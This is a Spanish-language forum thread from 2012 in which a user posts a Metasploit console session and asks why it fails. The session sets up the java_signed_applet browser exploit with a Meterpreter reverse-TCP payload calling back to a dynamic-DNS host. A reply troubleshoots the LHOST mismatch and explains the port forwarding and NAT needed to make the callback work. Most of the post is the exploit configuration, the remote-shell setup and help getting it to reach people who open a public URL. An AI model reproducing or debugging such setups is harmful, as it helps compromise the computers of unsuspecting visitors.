Título: Ayuda con exploit Publicado por: BlackSS en 5 Octubre 2012, 23:21 pm Buenas, estamos practicando el metasploit con unos amigos (Supongo que un tema sobre metasploit va aqui) Ahora vereis lo que me dice el metasploit, la version que es y en lo que falla.
__________________________________ | | METASPLOIT CYBE |__________________________________ \ \ . \ \ \ + * X / / / / . / . / / * + #### __ __ __ #### / \ / \ / \ # ################################### ################################### # WAVE 4 ######## SCORE 31337 ##### =[ metasploit v4.4.0-release + -- --=[ 902 exploits - 528 auxili + -- --=[ 250 payloads - 28 encoder
ed_applet msf exploit(java_signed_applet) > set PA YLOAD java/meterpreter/reverse_tcp PAYLOAD => java/meterpreter/reverse_tcp msf exploit(java_signed_applet) > set LH OST blackss.zapto.org LHOST => blackss.zapto.org msf exploit(java_signed_applet) > set TA RGET 0 TARGET => 0 msf exploit(java_signed_applet) > set UR IPATH /set SRVPORT 8080 URIPATH => /set SRVPORT 8080 msf exploit(java_signed_applet) > set LP ORT 4444 LPORT => 4444 msf exploit(java_signed_applet) > exploi t
[-] Handler failed to bind to 85.61.16.10 1:4444
Ahora se supone que mi amigo, que entra a blackss.zapto.org:8080 deberia salirme en el metasploit. El problema es que no sale. Cuando ellos se meten, lo que les sale es : Esta página web no está disponible Se ha interrumpido la conexión con blackss.zapto.org. Esto sale en chrome, despues de esperar un rato. Cual es el problema? Los comandos a utilizar fueron : use exploit/multi/browser/java_signed_applet set PAYLOAD java/meterpreter/reverse_tcp set LHOST reasen.zapto.org set TARGET 0 set URIPATH / set SRVPORT 8080 set LPORT 4444 exploit La version de metasploit es : metasploit v4.4.0-release Agradeceria mucho que respondieran y lo arreglaran... Título: Re: Ayuda con exploit Publicado por: ZxXxA en 15 Noviembre 2012, 22:53 pm Parsa, fíjese cmo declara LHOST => blackss.zapto.org y en los datos de bitacora que fascilita apunta lo siguiente: set LHOST reasen.zapto.org
Además, esa maniobra debería incluir la configuración de ruteo de puerto y reglas NAT´s si así estuviera afectado el router a dde dirige el dominio reasen.zapto.org (Revisar bien cuáles reglas fueron declaradas tb. al dominio***.zapto.org) Por lo que observo tu dirección IP dentro de la red LAN es Local IP: http://192.168.1.12:8080... deberías configurar las conexiones entrantes y salientes a ese puerto 8080 (ya tenés un Apache corriendo?) Además la persona se infectaría con una vulnerabilidad Java? Es un tanto ingenuo esa pensar que esa vulnerabilidad no será detectada por algún firewall/antivirus. A modo de laboratorio, puedes probarlo con diferentes maquinas virtuales usando proxys para ver cmo tira tu server con esa vulnerabilidad, probarlo con distros y navegadores vulnerables ;) Bendiciones carnaL |